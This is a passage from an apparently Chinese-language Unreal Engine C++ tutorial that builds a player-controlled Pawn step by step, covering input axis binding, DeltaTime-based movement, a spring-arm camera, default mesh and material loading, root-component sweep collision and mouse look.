    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    }

    ​开跑!

    png

    503-设置 GameMode 并自动持有 Pawn

    png

    ​对于 C++ Classes 下的 GameModeBase,创建游戏模式蓝图 Create Blueprint class based on ...

    png

    ​在创建的蓝图中的 Class Defaults,将 Default Pawn Class 设置为 BP_MyPawn

    png

    ​关卡中的 World Settings,设置好 GameMode Override

    png

    BP_MyPawn 中设置好 Auto Possess PlayerPlayer 0,或者直接修改 MyPawn.cpp,添加语句 AutoPossessPlayer = EAutoReceiveInput::Player0;

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));

    AutoPossessPlayer = EAutoReceiveInput::Player0;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    }

    504-按键映射与轴事件绑定

    png

    ​在 Project Settings 力设置按键映射。

    ​在 MyPawn.h 里定义私有的移动函数:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    };

    MyPawn.cpp 里将按键映射与轴事件绑定:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));

    AutoPossessPlayer = EAutoReceiveInput::Player0;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    }

    void AMyPawn::MoveRight(float Value)
    {
    }

    505-使用 Tick 的移动

    ​修改 MyActor.h 里的内容,定义变量 MaxSpeedVelocity

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    UPROPERTY(EditAnywhere, Category = "My Pawn Movement")
    float MaxSpeed;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    FVector Velocity;
    };

    ​修改 MyPawn.cpp 里的内容,使得物体能够随着输入而移动:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    506-为何要使用 DeltaTime 进行移动

    ​使用 DeltaTime 进行移动可以使得不同帧率下的场景移动速度相等。

    • 设有两玩家,Tick 中增量 $1$ 单位
      P1 $10$ FPS,$deltatime=1/10=0.1s$
      P2 $5$ FPS,$deltatime=1/ 5=0.2s$

    • 不使用 $deltatime$ 时
      P1: $10\times1$,$1$ 秒内移动了 $10$ 单位
      P2: $5\times1$,$1$ 秒内移动了 $5$ 单位

    • 使用 $deltatime$ 时
      P1: $10\times1\times0.1=1$,$1$ 秒内移动了 $1$ 单位
      P2: $5\times1\times0.2=1$,$1$ 秒内移动了 $1$ 单位

    • FPS: Frames Per Second
      $60$ FPS 即 $1$ 秒 $60$ 帧
      $30$ FPS 即 $1$ 秒 $30$ 帧

    • Tick 每帧调用
      $deltaTime$ 为两帧之间的间隔

    png

    ​视图中这里可以显示 FPS。

    png

    Content Browser 中按 `` 输入命令t.MaxFPS 10可以将最大帧率设为10`。

    507-添加 SpringArm 组件

    ​修改 MyPawn.h 里的内容,定义变量 class USpringArmComponent* MySpringArm;

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class USpringArmComponent* MySpringArm;

    UPROPERTY(EditAnywhere, Category = "My Pawn Movement")
    float MaxSpeed;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    FVector Velocity;
    };

    ​修改 MyPawn.cpp 里的内容:

    ​原课程使用了:

    1
    MySpringArm->RelativeRotation = FRotator(-45.0f, 0.0f, 0.0f);

    ​但在我这个版本中这个变量变成了私有,应该为:

    1
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySprintArm"));
    MySpringArm->SetupAttachment(MyStaticMesh);
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(MySpringArm);

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    ​删除原有的 BP_MyPawn,重新创建一个。然后开跑!

    png

    508-使用 C++ 代码设置模型与材质的默认值

    ​修改 MyPawn.h 里的内容,给 UStaticMeshComponentUSpringArmComponent 添加 Get 函数。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class USpringArmComponent* MySpringArm;

    UPROPERTY(EditAnywhere, Category = "My Pawn Movement")
    float MaxSpeed;

    FORCEINLINE UStaticMeshComponent* GetStaticMeshComponent() { return MyStaticMesh; }
    FORCEINLINE USpringArmComponent* GetSpringArmComponent() { return MySpringArm; }

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    FVector Velocity;
    };

    ​修改 MyPawn.cpp 里的内容:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"
    #include "UObject/ConstructorHelpers.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    static ConstructorHelpers::FObjectFinder<UStaticMesh> StaticMeshAsset(TEXT("StaticMesh'/Engine/EngineMeshes/Sphere.Sphere'"));
    static ConstructorHelpers::FObjectFinder<UMaterialInterface> MaterialAsset(TEXT("Material'/Engine/Tutorial/SubEditors/TutorialAssets/TutorialMaterial.TutorialMaterial'"));
    if (StaticMeshAsset.Succeeded() && MaterialAsset.Succeeded())
    {
    MyStaticMesh->SetStaticMesh(StaticMeshAsset.Object);
    MyStaticMesh->SetMaterial(0, MaterialAsset.Object);
    MyStaticMesh->SetWorldScale3D(FVector(0.5f));
    }

    MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySprintArm"));
    MySpringArm->SetupAttachment(GetStaticMeshComponent());
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(GetSpringArmComponent());

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    png

    StaticMeshAsset(TEXT()) 的里的值可以以此法获得。

    png

    MaterialAsset(TEXT()) 的里的值可以以此法获得。

    png

    ​编译后删除蓝图,重新构建 BP_MyPawn

    509-Sweep 仅对根组件生效

    ​之前的代码中:

    1
    AddActorLocalOffset(Velocity * DeltaTime, true);

    ​开启了 Sweep 却不能使得碰撞生效,这是因为 Sweep 只能对跟组件生效,因此要修改 MyPawn.cpp,将 MyStaticMesh 设为根组件:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"
    #include "UObject/ConstructorHelpers.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    // RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    RootComponent = MyStaticMesh;
    MyStaticMesh->SetCollisionProfileName(TEXT("Pawn"));

    static ConstructorHelpers::FObjectFinder<UStaticMesh> StaticMeshAsset(TEXT("StaticMesh'/Engine/EngineMeshes/Sphere.Sphere'"));
    static ConstructorHelpers::FObjectFinder<UMaterialInterface> MaterialAsset(TEXT("Material'/Engine/Tutorial/SubEditors/TutorialAssets/TutorialMaterial.TutorialMaterial'"));
    if (StaticMeshAsset.Succeeded() && MaterialAsset.Succeeded())
    {
    MyStaticMesh->SetStaticMesh(StaticMeshAsset.Object);
    MyStaticMesh->SetMaterial(0, MaterialAsset.Object);
    MyStaticMesh->SetWorldScale3D(FVector(0.5f));
    }

    MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySprintArm"));
    MySpringArm->SetupAttachment(GetStaticMeshComponent());
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(GetSpringArmComponent());

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    510-控制视野上下查看

    png

    Project Settings 里添加两个轴 LookUpLookRight

    ​修改 MyPawn.h 里的内容,定义函数 LookUp()LookRight(),鼠标的输入 MouseInput

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class USpringArmComponent* MySpringArm;

    UPROPERTY(EditAnywhere, Category = "My Pawn Movement")
    float MaxSpeed;

    FORCEINLINE UStaticMeshComponent* GetStaticMeshComponent() { return MyStaticMesh; }
    FORCEINLINE USpringArmComponent* GetSpringArmComponent() { return MySpringArm; }

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    FVector Velocity;

    void LookUp(float Value);
    void LookRight(float Value);
    FVector2D MouseInput;
    };

    ​修改 MyPawn.cpp 里的内容,完成视野随鼠标向上下查看的功能:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"
    #include "UObject/ConstructorHelpers.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    // RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    RootComponent = MyStaticMesh;
    MyStaticMesh->SetCollisionProfileName(TEXT("Pawn"));

    static ConstructorHelpers::FObjectFinder<UStaticMesh> StaticMeshAsset(TEXT("StaticMesh'/Engine/EngineMeshes/Sphere.Sphere'"));
    static ConstructorHelpers::FObjectFinder<UMaterialInterface> MaterialAsset(TEXT("Material'/Engine/Tutorial/SubEditors/TutorialAssets/TutorialMaterial.TutorialMaterial'"));
    if (StaticMeshAsset.Succeeded() && MaterialAsset.Succeeded())
    {
    MyStaticMesh->SetStaticMesh(StaticMeshAsset.Object);
    MyStaticMesh->SetMaterial(0, MaterialAsset.Object);
    MyStaticMesh->SetWorldScale3D(FVector(0.5f));
    }

    MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySprintArm"));
    MySpringArm->SetupAttachment(GetStaticMeshComponent());
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(GetSpringArmComponent());

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);

    // X, Y, Z 在虚幻的旋转轴对应 Roll, Pitch, Yaw
    FRotator NewSpringArmRotation = MySpringArm->GetComponentRotation();
    NewSpringArmRotation.Pitch = FMath::Clamp(NewSpringArmRotation.Pitch += MouseInput.Y, -80.0f, 0.0f);
    MySpringArm->SetWorldRotation(NewSpringArmRotation);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    PlayerInputComponent->BindAxis(TEXT("LookUp"), this, &AMyPawn::LookUp);
    PlayerInputComponent->BindAxis(TEXT("LookRight"), this, &AMyPawn::LookRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
